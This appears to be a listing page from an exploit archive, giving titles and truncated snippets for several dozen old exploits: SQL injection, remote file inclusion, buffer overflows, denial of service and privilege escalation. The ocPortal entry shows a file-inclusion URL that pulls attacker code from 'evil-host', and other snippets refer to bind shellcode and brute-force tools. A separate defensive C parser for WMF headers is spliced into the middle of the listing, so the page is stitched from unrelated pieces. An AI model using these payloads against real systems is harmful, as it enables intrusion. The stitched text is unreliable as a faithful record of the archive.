e-Vision CMS 2.0 - all_users.php SQL Injection
e-Vision CMS 2.0 - all_users.php SQL Injection !/usr/bin/php -q -d short_open_tag=on / / site: http://www.soqor.net /'; if $argc0 Echo trim$var1; $page = getpage$url.$exploit; $page2 = getpage$url.$exploit2; ifpregmatch'/.+?/is',$page Echo "\n+...
osCommerce 2.12.2 - product_info.php SQL Injection
osCommerce 2.12.2 - product_info.php SQL Injection source: https://www.securityfocus.com/bid/19774/info osCommerce is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data. A successful exploit may allow an attacker to compromise the...
Integramod Portal 2.0 rc2 - phpbb_root_path Remote File Inclusion
Integramod Portal 2.0 rc2 - phpbb_root_path Remote File Inclusion matasanos Integramod Portal 2.x File Inclusion Vulnerabilities affected software: Integramod Portal vendor: Integramod . you can download it from http://www.integramod.com level: Highly Critical...
VistaBB 2.x - functions_mod_user.php Remote File Inclusion
VistaBB 2.x - functions_mod_user.php Remote File Inclusion !/usr/bin/perl Method found and exploit scripted by nukedx Contacts ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected] Original advisory can be found at: http://www.nukedx.com/?viewdoc=48 VistaBB Copyright 2006 (C) nukedx Greet...
Mambo Component Rssxt 1.0 - MosConfig_absolute_path Multiple Remote File Inclusions
Mambo Component Rssxt 1.0 - MosConfig_absolute_path Multiple Remote File Inclusions source: https://www.securityfocus.com/bid/19593/info The Mambo Rssxt component for Joomla and Mambo is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An...
OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows (PoC)
OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows PoC / by Luigi Auriemma / include include include include ifdef WIN32 include // htonl else include endif define VER "0.1" define HEAPOVERSZ 512 define ITPHEAPOVERSZ 150000 define ALLOCSAMPLESZ 39 & 7 + 16 define SONGITPROJECT 0x20000 void...
DConnect Daemon DC Chat - Denial of Service
DConnect Daemon DC Chat - Denial of Service source: https://www.securityfocus.com/bid/19370/info DConnect Daemon is prone to a denial-of-service vulnerability. This issue occurs because the application fails to handle null-pointer exceptions properly. An attacker can exploit this issue to crash t...
Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution
Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution // MoBB Demonstration function Demo // Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html // https://bugzilla.mozilla.org/show_bug.cgi?id=342267 // CVE-2006-3677 // The Java plugin is required for this to...
QBik WinGate WWW Proxy Server 6.1.1.1077 - POST Remote Buffer Overflow
QBik WinGate WWW Proxy Server 6.1.1.1077 - POST Remote Buffer Overflow Proof of concept not for "in the wild" kiddies QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 german by kcope in 2006 use IO::Socket; if ($ARGV[0] eq "") { print "param1 = remote host"; exit; } win32_bind - EXITFUNC=seh...
dotWidget for articles 2.0 - showarticle.php?file_path Remote File Inclusion
dotWidget for articles 2.0 - showarticle.php?file_path Remote File Inclusion source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied...
panic-reloaded - TCP Denial of Service Tool
panic-reloaded - TCP Denial of Service Tool / Security Community...
Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities
Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities source: https://www.securityfocus.com/bid/17438/info Guestbook is prone to multiple HTML-injection vulnerabilities; the application fails to properly sanitize user-supplied input before using it in dynamically...
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)
MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) / $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $ raptor_udf2.c - dynamic library for do_system MySQL UDF Copyright (c) 2006 Marco Ivaldi This is a helper dynamic library for local privilege escalation through MySQL run with...
Cisco Aironet Wireless Access Points - Memory Exhaustion ARP (Denial of Service)
Cisco Aironet Wireless Access Points - Memory Exhaustion ARP Denial of Service // // Cisco Killer - ciskill.c // // Usage: ./ciskill device // // Author: Pasv pasvninja at gmail.com // // Credit: This exploit takes advantage of a vulnerability that was // discovered by Eric Smith on January 12,...
EZDatabase 2.1.1 - index.php Cross-Site Scripting
EZDatabase 2.1.1 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/16257/info EZDatabase is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to ha...
SoftBiz B2B trading Marketplace Script 1.1 - selloffers.php?cid SQL Injection
SoftBiz B2B trading Marketplace Script 1.1 - selloffers.php?cid SQL Injection source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize...
Microsoft Windows Metafile - mtNoObjects Denial of Service (MS05-053)
Microsoft Windows Metafile - mtNoObjects Denial of Service MS05-053 / Author: Winny Thomas Pune, INDIA The crafted metafile WMF from this code when viewed in explorer crashes it. The issue is seen when the field 'mtNoObjects' in the Metafile header is set to 0x0000. The code was tested on Windows...
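The entry above names the trigger precisely: a WMF whose METAHEADER carries mtNoObjects == 0x0000. The following is an added example, not Winny Thomas's PoC and not code from the page: a minimal little-endian parser for the 18-byte WMF METAHEADER (mtType, mtHeaderSize, mtVersion, mtSize, mtNoObjects, mtMaxRecord, mtNoParameters), which also skips the optional 22-byte "placeable" header keyed by 0x9AC6CDD7, and a check that rejects a file whose header is truncated, has an impossible mtType/mtHeaderSize, or declares zero objects. The sample headers are constructed inline; the function names and the decision to treat mtNoObjects == 0 as suspicious (a benign file that creates no GDI objects would also be flagged) are this example's own choices.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* WMF METAHEADER: 18 bytes, little-endian, optionally preceded by the
 * 22-byte "placeable" header whose first DWORD is 0x9AC6CDD7. */
#define WMF_PLACEABLE_KEY  0x9AC6CDD7u
#define WMF_PLACEABLE_LEN  22u
#define WMF_METAHEADER_LEN 18u

struct wmf_header {
    uint16_t type;          /* mtType: 1 = memory metafile, 2 = disk metafile */
    uint16_t header_size;   /* mtHeaderSize: header length in WORDs, always 9 */
    uint16_t version;       /* mtVersion: 0x0100 or 0x0300 */
    uint32_t size_words;    /* mtSize: file length in WORDs */
    uint16_t no_objects;    /* mtNoObjects: the field MS05-053 trips over at 0 */
    uint32_t max_record;    /* mtMaxRecord: largest record, in WORDs */
    uint16_t no_parameters; /* mtNoParameters: reserved, 0 */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v & 0xff); p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)(v & 0xffff)); wr16(p + 2, (uint16_t)(v >> 16)); }

/* Parse the header. Returns 0 on success, -1 if the buffer is too short,
 * -2 if mtType/mtHeaderSize are not values a WMF can legitimately carry. */
int wmf_parse_header(const uint8_t *buf, size_t len, struct wmf_header *out) {
    size_t off = 0;
    if (len >= 4 && rd32(buf) == WMF_PLACEABLE_KEY)
        off = WMF_PLACEABLE_LEN;          /* skip the Aldus placeable header */
    if (len < off + WMF_METAHEADER_LEN)
        return -1;
    const uint8_t *h = buf + off;
    out->type          = rd16(h + 0);
    out->header_size   = rd16(h + 2);
    out->version       = rd16(h + 4);
    out->size_words    = rd32(h + 6);
    out->no_objects    = rd16(h + 10);
    out->max_record    = rd32(h + 12);
    out->no_parameters = rd16(h + 16);
    if ((out->type != 1 && out->type != 2) || out->header_size != 9)
        return -2;
    return 0;
}

/* 1 = reject (malformed header, or mtNoObjects == 0), 0 = header looks sane. */
int wmf_is_suspicious(const uint8_t *buf, size_t len) {
    struct wmf_header h;
    if (wmf_parse_header(buf, len, &h) != 0)
        return 1;
    return h.no_objects == 0;
}

/* Constructed sample: a disk-metafile header with the given mtNoObjects,
 * with or without a placeable header in front. Returns bytes written. */
size_t wmf_build_header(uint8_t *out, uint16_t no_objects, int placeable) {
    size_t off = 0;
    if (placeable) {
        memset(out, 0, WMF_PLACEABLE_LEN);
        wr32(out, WMF_PLACEABLE_KEY);
        off = WMF_PLACEABLE_LEN;
    }
    wr16(out + off + 0, 2);        /* mtType = disk */
    wr16(out + off + 2, 9);        /* mtHeaderSize */
    wr16(out + off + 4, 0x0300);   /* mtVersion */
    wr32(out + off + 6, 9);        /* mtSize: header only */
    wr16(out + off + 10, no_objects);
    wr32(out + off + 12, 0);       /* mtMaxRecord */
    wr16(out + off + 16, 0);       /* mtNoParameters */
    return off + WMF_METAHEADER_LEN;
}

int main(void) {
    uint8_t buf[64];
    size_t n = wmf_build_header(buf, 0, 0);
    printf("mtNoObjects=0 -> suspicious=%d\n", wmf_is_suspicious(buf, n));
    n = wmf_build_header(buf, 4, 1);
    printf("mtNoObjects=4 -> suspicious=%d\n", wmf_is_suspicious(buf, n));
    printf("truncated     -> suspicious=%d\n", wmf_is_suspicious(buf, 10));
    return 0;
}
```

The check is deliberately conservative: anything the parser cannot fully read is rejected rather than passed on to the renderer, which is the right default for a gateway or mail filter in front of an unpatched viewer.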
PBLang 4.65 - Remote Command Execution (2)
PBLang 4.65 - Remote Command Execution (2) php.exe ..\www\r57pblang465.php localhost /pbl/ "pblcookie732128=Pe ng0; PBLsecid=a4c2f845c002ac54f5751440647f3c91;" Peng0 PrSrS $ARGV = $_SERVER['argv']; global $ARGV; if (count($ARGV) == 0) echo...
K-COLLECT CSV_DB.CGI 1.0 / i_DB.CGI 1.0 - Remote Command Execution
K-COLLECT CSV_DB.CGI 1.0 / i_DB.CGI 1.0 - Remote Command Execution // source: https://www.securityfocus.com/bid/14059/info CSV_DB.CGI/i_DB.CGI are affected by a remote command execution vulnerability. Specifically, an attacker can supply arbitrary commands prefixed with the '|' character through the...
BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting
BEA WebLogic 7.0/8.1 - Administration Console LoginForm.jsp Cross-Site Scripting source: https://www.securityfocus.com/bid/13793/info BEA WebLogic Server And WebLogic Express are affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitiz...
AIX 5.1 Bellmail - Local Race Condition
AIX 5.1 Bellmail - Local Race Condition -bash-2.05b$ -bash-2.05b$ cat xaix5bellmail.pl !/usr/bin/perl FileName: xaix5bellmail.pl Exploit "Race condition vulnerability BUGTRAQ ID: 8805" of /usr/bin/bellmail command on Aix5 to change any file owner to current user. Usage : xaix5bellmail.pl aimfile...
Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Local Privilege Escalation (1)
Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Local Privilege Escalation (1) / EDB Note: Updated exploit can be found here; https://www.exploit-db.com/exploits/25203/ source: https://www.securityfocus.com/bid/12763/info A local integer overflow vulnerability affects the Linux kernel. Thi...
PostNuke Phoenix 0.7x - CATID SQL Injection
PostNuke Phoenix 0.7x - CATID SQL Injection source: https://www.securityfocus.com/bid/12683/info PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input. It is reported that the issue presents itself when maliciou...
Microsoft Internet Explorer - .ANI Downloader (MS05-002)
Microsoft Internet Explorer - .ANI Downloader (MS05-002) / Modified by Vertygo aka Ivanm [email protected] all credits goes to houseofdabus Berend-Jan Wever and to milw0rm/ / Added string.h /str0ke / / HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2 Copyright (c) 2004-2005 houseofdabus. MS05-002...
Webmin 1.5 - Web Brute Force (CGI)
Webmin 1.5 - Web Brute Force (CGI) !/usr/bin/perl use CGI qw(:standard); use IO::Socket; $CGI::HEADERS_ONCE = 1; $CGI = new CGI; $atak = $CGI->param("atak"); $host = $CGI->param("host"); $wlist = $CGI->param("wlist"); $cmd = $CGI->param("cmd"); print $CGI->header(-type=>'text/html', -charset=>'windows-1254'); print...
Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing
Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing Advisory Information ------------------------- Software Package : Hosting Controller Vendor Homepage : http://www.hostingcontroller.com Platforms : Windows based servers Vulnerable Versions : All versions Tested on: v.6.1 Hotfix 1.4 Vendor...
phpBB 2.0.x - admin_cash.php PHP Remote File Inclusion
phpBB 2.0.x - admin_cash.php PHP Remote File Inclusion source: https://www.securityfocus.com/bid/11701/info A vulnerability is reported to exist in the phpBB CashMod module that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system...
AlShare Software NetNote Server 2.2 - Remote Denial of Service
AlShare Software NetNote Server 2.2 - Remote Denial of Service // source: https://www.securityfocus.com/bid/11677/info NetNote server is reported prone to a remote denial of service vulnerability. This issue occurs because the application does not handle exceptional conditions properly. NetNote...
Veritas NetBackup - Remote Command Execution (Metasploit)
Veritas NetBackup - Remote Command Execution (Metasploit) $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more...
ocPortal 1.0.3 - Remote File Inclusion
ocPortal 1.0.3 - Remote File Inclusion http://localhost/ocp-103/index.php?req_path=http://evil-host/ On your evil host you must put the script funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host supports php. '; ?...
Microsoft Windows - JPEG GDI+ Remote Heap Overflow (MS04-028)
Microsoft Windows - JPEG GDI+ Remote Heap Overflow MS04-028 / GDI+ JPEG Remote Exploit By John Bissell A.K.A. HighT1mes Exploit Name: ============= JpegOfDeath.c v0.5 Date Exploit Released: ====================== Sep, 23, 2004 Description: ============ Exploit based on FoToZ exploit but kicks the...
Polar Helpdesk 3.0 - Cookie Based Authentication Bypass
Polar Helpdesk 3.0 - Cookie Based Authentication Bypass source: https://www.securityfocus.com/bid/10775/info Polar Helpdesk is reported prone to a cookie based authentication system bypass vulnerability. It is reported that the authentication and privilege system for Polar Helpdesk is based...
WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)
WebSTAR FTP Server 5.3.2 OSX - USER Overflow Metasploit $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow
CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow include include include include include include include include include include include include include include typedef unsigned char uchar; void progress(void); int brute_cvsroot(void); int brute_username(void); int brute_password(void); void hdl_crashed(int...
HelpCenter Live! 1.2.7 - Multiple Vulnerabilities
HelpCenter Live! 1.2.7 - Multiple Vulnerabilities HelpCenter Live! Multiple Vulnerabilities Vendor: Michael Bird Product: HelpCenter Live! Version: <= 1.2.7 Website: http://www.helpcenterlive.com/ BID: 13666 13667 CVE: CVE-2005-1672 CVE-2005-1673 CVE-2005-1674 OSVDB: 16651 16652 16653 16654 16655...
Microsoft Windows - ASN.1 Remote (MS04-007)
Microsoft Windows - ASN.1 Remote MS04-007 Microsoft ASN.1 remote exploit for CVE-2005-1935 // MS04-007 Solar Eclipse solareclipse at phreedom dot org https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3022.tar.gz 12262006-killbill.tar.gz milw0rm.com 2004-03-26...
Linux Kernel 2.2.25/2.4.24/2.6.2 - mremap() Validator
Linux Kernel 2.2.25/2.4.24/2.6.2 - mremap() Validator / Proof-of-concept exploit code for do_mremap (2) EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "do_mremap (1)". EDB Note: This will just "test" the vulnerability. An exploit version c...
Pine 4.56 - Remote Buffer Overflow
Pine 4.56 - Remote Buffer Overflow / Mon Sep 15 09:35:01 CEST 2003 remote? Pine eip/ebp this can actually be "bruteforced" I didn't show this since this is a PoC and uses "exact offsets" All you do is supply multiple charsets and overwrite larger areas of memory This makes method 1 100% successful...
FTP Service 1.2 - Multiple Vulnerabilities
FTP Service 1.2 - Multiple Vulnerabilities FTP Service Multiple Vulnerabilities Vendor: Pablo Software Solutions Product: FTP Service Version: <= 1.2 Website: http://www.pablovandermeer.nl/ftpservice.html BID: 7799 7801 Description: FTPService.exe is a service-version of Pablo's FTP Server. This...
OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool
OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool / SSHBRUTE - OpenSSH/PAM Proof of concept code by Maurizio Agazzini Tested against Red Hat, Mandrake, and Debian GNU/Linux. Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt $ tar xvfz openssh-3.6.1p1.tar.gz $ patch -p0 include...
CesarFTP 0.99 g - Remote CWD Denial of Service
CesarFTP 0.99 g - Remote CWD Denial of Service source: https://www.securityfocus.com/bid/7950/info A vulnerability has been reported for CesarFTP. Reportedly, an attacker may crash a target server by supplying excessive data as the argument to the 'CWD' command. This may result in the server...
PHP 4 - PHPInfo() Cross-Site Scripting
PHP 4 - PHPInfo Cross-Site Scripting source: https://www.securityfocus.com/bid/7805/info Scripts that include the PHP phpinfo debugging function may be prone to cross-site scripting attacks. This could permit remote attackers to create a malicious link to a vulnerable PHP script that includes...
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (3)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (3) // source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely...
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2) // source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely...
Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow
Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow // source: https://www.securityfocus.com/bid/5188/info The Microsoft Foundation Class Library is a library used to develop applications for Microsoft Windows. Some versions of the MFC include an ISAPI class, which can be used to...
Microsoft Windows Server 2000 - Lanman Denial of Service (1)
Microsoft Windows Server 2000 - Lanman Denial of Service 1 // source: https://www.securityfocus.com/bid/4532/info An issue has been discovered in Windows 2000, which could cause a denial of system services. Submitting malformed data to port 445 could cause the Lanman service to consume high CPU a...
DC Scripts DCShop Beta 1.0 02 - File Disclosure (1)
DC Scripts DCShop Beta 1.0 02 - File Disclosure (1) source: https://www.securityfocus.com/bid/2889/info DCShop is a CGI-based ecommerce system from DCScripts. Under certain configurations, a beta version of this product can allow a remote user to request and obtain files containing confidential ord...
NTPd - Remote Buffer Overflow
NTPd - Remote Buffer Overflow // source: https://www.securityfocus.com/bid/2540/info NTP, the Network Time Protocol, is used to synchronize the time between a computer and another system or time reference. It uses UDP as a transport protocol. There are two protocol versions in use: NTP v3 and NTP...
Ethereal - AFS Buffer Overflow
Ethereal - AFS Buffer Overflow / source: https://www.securityfocus.com/bid/1972/info Ethereal is a network auditing utility originally written by Gerald Combs. A problem exists in the Ethereal package which can allow a remote user to execute code. The problem exists in the AFS packet parsing...
SUIDPerl 5.00503 - Mail Shell Escape (2)
SUIDPerl 5.00503 - Mail Shell Escape 2 source: https://www.securityfocus.com/bid/1547/info The interaction between some security checks performed by suidperl, the setuid version of perl, and the /bin/mail program creates a scenario that allows local malicious users to execute commands with root...